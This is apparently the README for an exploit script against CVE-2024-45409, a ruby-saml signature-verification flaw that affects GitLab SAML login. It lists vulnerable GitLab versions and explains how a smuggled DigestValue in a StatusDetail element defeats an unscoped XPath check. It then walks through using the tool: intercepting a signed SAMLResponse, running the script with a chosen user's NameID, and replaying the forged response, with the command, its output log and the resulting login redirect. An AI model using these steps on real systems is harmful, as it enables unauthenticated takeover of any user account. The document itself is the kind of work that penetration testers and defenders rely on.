This script exploits CVE-2024-45409, a signature-verification flaw in the ruby-saml library that GitLab uses for SAML login. It allows an unauthenticated attacker who holds any signed SAML document issued by the IdP to forge a SAML Response/Assertion and authenticate to GitLab as any user.
All of the following GitLab (CE/EE) versions are vulnerable when SAML authentication is enabled:
- < 16.11.10
- 17.0.x < 17.0.8
- 17.1.x < 17.1.8
- 17.2.x < 17.2.7
- 17.3.x < 17.3.3
Vulnerable ruby-saml versions locate the DigestValue to compare with an XPath selector of the form `//ds:DigestValue`, which is evaluated from the document root rather than from the Signature being verified. The exploit keeps the IdP's original Signature (its SignedInfo and SignatureValue still verify) and plants a cloned ds:Reference carrying the DigestValue of the modified assertion inside a StatusDetail element. Because StatusDetail precedes the Assertion in document order, the unscoped selector picks up the smuggled DigestValue instead of the one in the signed SignedInfo block, so the digest of the forged assertion "matches" while the signature check still passes.
Requirements:
- A valid SAML Response signed by the IdP (it does not have to be fresh or belong to the target user: the script rewrites the NameID and the assertion conditions)
Install the lxml dependency:

```
apt install python3-lxml
```
First intercept the SAML callback request and copy the URL-encoded, Base64-encoded SAMLResponse value issued by the IdP into a file, then modify the XML content using the script.

```
POST /users/auth/saml/callback HTTP/1.1
Host: gitlab.test.local
[...]

SAMLResponse=PHNhbWxwOlJlc3Bv[...]
```
```
$ python3 CVE-2024-45409.py -r response.url_base64 -n [email protected] -d -e -o response_patched.url_base64
[+] Parse response
Digest algorithm: sha256
Canonicalization Method: http://www.w3.org/2001/10/xml-exc-c14n#
[+] Remove signature from response
[+] Patch assertion ID
[+] Patch assertion NameID
[+] Patch assertion conditions
[+] Move signature in assertion
[+] Patch response ID
[+] Insert malicious reference
[+] Clone signature reference
[+] Create status detail element
[+] Patch digest value
[+] Write patched file in response_patched.url_base64
```
Then replace the SAMLResponse parameter value in the intercepted request with the script output and send it. If the forged assertion is accepted, GitLab creates a session for the chosen user and redirects you to the homepage:

```
HTTP/1.1 302 Found
Location: http://gitlab.test.local/
[...]

<html><body>You are being <a href="http://gitlab.test.local/">redirected</a>.</body></html>
```